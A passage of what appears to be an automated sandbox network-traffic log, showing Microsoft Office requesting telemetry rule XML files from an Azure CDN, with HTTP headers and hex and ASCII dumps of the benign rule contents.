                                                2024-10-29 23:22:47 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                2024-10-29 23:22:47 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
                                                2024-10-29 23:22:47 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 54 65 6e 61 6e 74 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 55 73 65 72 20 65 6e 61 62 6c 65 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: R> </O> </F> <F T="6"> <O T="AND"> <L> <S T="3" F="Tenant enabled" /> </L> <R> <O T="EQ"> <L> <S T="3" F="User enabled" /> </L>
                                                2024-10-29 23:22:47 UTC16384INData Raw: 54 3d 22 36 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 48 74 74 70 53 74 61 74 75 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 34 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                Data Ascii: T="6"> <O T="EQ"> <L> <S T="2" F="HttpStatus" /> </L> <R> <V V="404" T="U32" /> </R> </O> </F> <F T="7"> <O T="AND"> <L> <O T="GE"> <


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16192.168.2.45806313.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:48 UTC192OUTGET /rules/rule224902v2s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:48 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:48 GMT
                                                Content-Type: text/xml
                                                Content-Length: 450
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:27:25 GMT
                                                ETag: "0x8DC582BD4C869AE"
                                                x-ms-request-id: 8f1f3dd8-601e-0097-4789-28f33a000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232248Z-15b8d89586f4zwgbgswvrvz4vs00000008fg00000000h7d7
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:48 UTC450INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 32 22 20 56 3d 22 32 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 62 72 35 71 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 61 33 36 61 39 37 30 64 2d 34 35 61 39 2d 34 65 30 64 2d 39 63 61 62 2d 32 61 32 33 35 63 63 39 64 37 63 36 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 47 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 4e
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224902" V="2" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120100" /> <UTS T="2" Id="bbr5q" /> <SS T="3" G="{a36a970d-45a9-4e0d-9cab-2a235cc9d7c6}" /> </S> <C T="G" I="0" O="falseN


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                17192.168.2.45806513.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:48 UTC192OUTGET /rules/rule120609v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:48 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:48 GMT
                                                Content-Type: text/xml
                                                Content-Length: 408
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                ETag: "0x8DC582BB56D3AFB"
                                                x-ms-request-id: 11ae3112-301e-005d-596b-27e448000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232248Z-16849878b78qg9mlz11wgn0wcc00000006q000000000wepk
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:48 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 38 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 44 64 5d 5b 45 65 5d 5b 4c 6c 5d 5b 4c 6c 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120609" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120682" /> <SR T="2" R="^([Dd][Ee][Ll][Ll])"> <S T="1" F="0" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                18192.168.2.45806413.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:48 UTC192OUTGET /rules/rule120600v4s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:48 UTC584INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:48 GMT
                                                Content-Type: text/xml
                                                Content-Length: 2980
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                                                ETag: "0x8DC582BA80D96A1"
                                                x-ms-request-id: 834668b8-301e-0052-121c-2765d6000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232248Z-16849878b78fkwcjkpn19c5dsn000000067000000000e1x6
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:48 UTC2980INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 30 22 20 56 3d 22 34 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 44 65 76 69 63 65 43 6f 6e 73 6f 6c 69 64 61 74 65 64 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120600" V="4" DC="SM" EN="Office.System.SystemHealthMetadataDeviceConsolidated" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC"


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19192.168.2.45806213.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:48 UTC193OUTGET /rules/rule120402v21s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:48 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:48 GMT
                                                Content-Type: text/xml
                                                Content-Length: 3788
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT
                                                ETag: "0x8DC582BAC2126A6"
                                                x-ms-request-id: 5d69bbb7-d01e-008e-6d6a-27387a000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232248Z-r197bdfb6b48v72xb403uy6hns00000007wg000000009hs9
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:48 UTC3788INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 34 30 32 22 20 56 3d 22 32 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 55 6e 67 72 61 63 65 66 75 6c 41 70 70 45 78 69 74 44 65 73 6b 74 6f 70 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 22 20 78 6d 6c 6e 73 3d 22 22
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120402" V="21" DC="SM" EN="Office.System.SystemHealthUngracefulAppExitDesktop" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalCensus" DL="A" DCa="PSP" xmlns=""


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20192.168.2.45806613.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:48 UTC192OUTGET /rules/rule120608v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:48 UTC563INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:48 GMT
                                                Content-Type: text/xml
                                                Content-Length: 2160
                                                Connection: close
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Vary: Accept-Encoding
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                ETag: "0x8DC582BA3B95D81"
                                                x-ms-request-id: f31c25f5-601e-0001-6558-27faeb000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232248Z-r197bdfb6b4g24ztpxkw4umce800000008qg00000000g37p
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:48 UTC2160INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 36 37 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 33 22 20 52 3d 22 31 32 30 36 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 34 22 20 52 3d 22 31 32 30 36 31 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 35 22 20 52 3d 22 31 32 30 36 31 34 22 20 2f 3e 0d 0a 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120608" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <R T="1" R="120609" /> <R T="2" R="120679" /> <R T="3" R="120610" /> <R T="4" R="120612" /> <R T="5" R="120614" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                21192.168.2.45806713.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:49 UTC192OUTGET /rules/rule120610v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:49 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:49 GMT
                                                Content-Type: text/xml
                                                Content-Length: 474
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:46 GMT
                                                ETag: "0x8DC582B9964B277"
                                                x-ms-request-id: 7b93b929-d01e-0082-6676-27e489000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232249Z-16849878b78qf2gleqhwczd21s00000007b000000000nndn
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache-Info: L1_T2
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:49 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120610" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                22192.168.2.45806813.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:49 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:49 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:49 GMT
                                                Content-Type: text/xml
                                                Content-Length: 415
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                ETag: "0x8DC582B9F6F3512"
                                                x-ms-request-id: e5fe76b8-601e-0050-2e06-262c9c000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232249Z-17c5cb586f6wmhkn5q6fu8c5ss00000006m000000000b64m
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:49 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23192.168.2.45807013.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:49 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:49 UTC470INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:49 GMT
                                                Content-Type: text/xml
                                                Content-Length: 632
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                ETag: "0x8DC582BB6E3779E"
                                                x-ms-request-id: 8abc48b9-201e-0096-2f4f-28ace6000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232249Z-15b8d89586fmc8ck21zz2rtg1w00000004ag00000000hczq
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:49 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                24192.168.2.45806913.107.246.60443
                                                TimestampBytes transferredDirectionData
                                                2024-10-29 23:22:49 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                Connection: Keep-Alive
                                                Accept-Encoding: gzip
                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                Host: otelrules.azureedge.net
                                                2024-10-29 23:22:49 UTC491INHTTP/1.1 200 OK
                                                Date: Tue, 29 Oct 2024 23:22:49 GMT
                                                Content-Type: text/xml
                                                Content-Length: 471
                                                Connection: close
                                                Cache-Control: public, max-age=604800, immutable
                                                Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                ETag: "0x8DC582BB10C598B"
                                                x-ms-request-id: 4755be7f-e01e-0052-062b-26d9df000000
                                                x-ms-version: 2018-03-28
                                                x-azure-ref: 20241029T232249Z-16849878b78j7llf5vkyvvcehs000000085g00000000xz4h
                                                x-fd-int-roxy-purgeid: 0
                                                X-Cache: TCP_HIT
                                                X-Cache-Info: L1_T2
                                                Accept-Ranges: bytes
                                                2024-10-29 23:22:49 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                Session IDSource IPSource PortDestination IPDestination Port
